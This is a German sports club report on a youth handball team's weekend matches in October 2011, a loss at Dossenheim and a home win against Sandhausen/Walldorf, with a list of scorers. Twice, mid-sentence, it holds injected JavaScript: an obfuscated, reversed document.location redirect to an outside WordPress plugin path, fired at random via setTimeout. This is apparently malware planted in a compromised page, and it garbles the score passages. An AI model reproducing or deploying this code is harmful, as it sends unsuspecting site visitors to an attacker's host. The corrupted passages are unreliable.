Hartes Wochenende für die TVN E-Jugend

Für die E-Jugend standen am Wochenende (22./23.10.2011) zwei kräftezehrende Spiele sowohl am Samstag als auch am Sonntag an. Der Auftritt am Sonntag verlief mit dem ersten Saisonsieg besonders erfolgreich.

Als erstes ging es am Samstag zum Auswärtsspiel nach Dossenheim. Leider wurde schon nach wenigen Minuten sowohl die spielerische- als auch körperliche Überlegenheit des Gastgebers deutlich. Die Folge: Eine (nach Multiplikatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor) 30:363 Niederlage. Als lobenswertes Resümee für den Samstag bleibt zu vermerken, dass unsere jungen Spieler im Verlauf des Spiels trotz des hohen Rückstands nicht resignierten, sondern bis zum Schlusspfiff ‚am Ball‘ blieben.

Bereits am Sonntag vormittag traf sich die Mannschaft erneut

Diesmal zum ersten Heimspiel gegen die JSG Sandhausen/Walldorf in der Neckargemünder Münzenbachhalle. Hochmotiviert ging unser junges Team ins Spiel. Beide Mannschaften kämpften ab der ersten Minute um jeden Ball und jede Torchance. Die Zuschauer sahen an diesem Vormittag eine spielerisch harte, aber fair umkämpfte Partie. So blieb das Spiel aufgrund der Leistung beider Mannschaften bis zur letzten Minute spannend.

Natürlich waren der Trainerin die vielen unnötigen Ballverluste und Abwehrschwächen – vor allem in der zweiten Halbzeit – ein Dorn im Auge. Doch nach einem ‚lauten‘ Wachrütteln von Sylvie Trunzer mobilisierten die TVN-Mädels und -Jungs nochmal alle Kräfte. Dafür wurden sie letztlich auch belohnt. Mit dem Endstand von 125:95 (nach Multiplikatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor) entschieden sie das Spiel für sich.

Ein weiterer Vorteil: Durch den hart erkämpften Sieg war die herbe Enttäuschung vom Vortag in Dossenheim bei den E-Jugendlichen schnell vergessen.

Torschützen: Johannes Schaum (5), Mika Paulus (1), Lars Harant (1), Ronja Gölz (2), Collin Schmoll (1),Danny Kinzig (1), Marcel Gscheidle (2) , Francico Monsalve (3)